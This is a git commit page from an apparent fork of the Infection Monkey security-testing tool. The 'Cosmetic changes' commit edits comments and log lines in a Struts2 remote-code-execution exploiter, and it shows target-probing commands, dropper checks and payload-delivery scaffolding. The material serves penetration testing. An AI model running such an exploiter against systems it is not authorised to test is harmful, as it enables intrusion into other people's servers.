p15670423
/
monkey
1
0
Fork 5
Code Issues Pull Requests 3 Projects Releases Wiki Activity

Cosmetic changes

This commit is contained in:
Vakaris 2018-06-21 00:10:56 +03:00
parent ef6c512ea9
commit 208411d6fc
1 changed files with 3 additions and 5 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

8
infection_monkey/exploit/struts2.py
View File

@ -30,9 +30,8 @@ CHECK_LINUX = "echo %s && lscpu" % ID_STRING
EXISTS = "ls %s"
WEB_PORTS = [80, 443, 8080]
# Timeouts if the payload is wrong
DOWNLOAD_TIMEOUT = 30
# This is set so that we don't have to wait for monkeys' output (in seconds)
# In seconds. This is set so that we don't have to wait for monkeys' output.
RESPONSE_TIMEOUT = 1
@ -62,8 +61,6 @@ class Struts2Exploiter(HostExploiter):
current_host = "http://%s:%d" % (self.host.ip_addr, port)
# Get full URL
url = self.get_redirected(current_host)
# Get os architecture so that we don't have to update monkey
LOG.info("Trying to exploit with struts2")
# Check if host is vulnerable and get host os architecture
if 'linux' in self.host.os['type']:
@ -87,7 +84,7 @@ class Struts2Exploiter(HostExploiter):
if url and host_arch:
LOG.info("Host is exploitable with struts2 RCE vulnerability")
# If monkey already exists and option not to exploit in that case is selected
if self.skip_exist and (self.check_remote_file(url, dropper_path)):
if self.skip_exist and self.check_remote_file(url, dropper_path):
return True
src_path = get_target_monkey(self.host)
@ -194,6 +191,7 @@ class Struts2Exploiter(HostExploiter):
try:
return urllib2.urlopen(request).geturl()
except urllib2.URLError:
LOG.error("Can't reach struts2 server")
return False
@staticmethod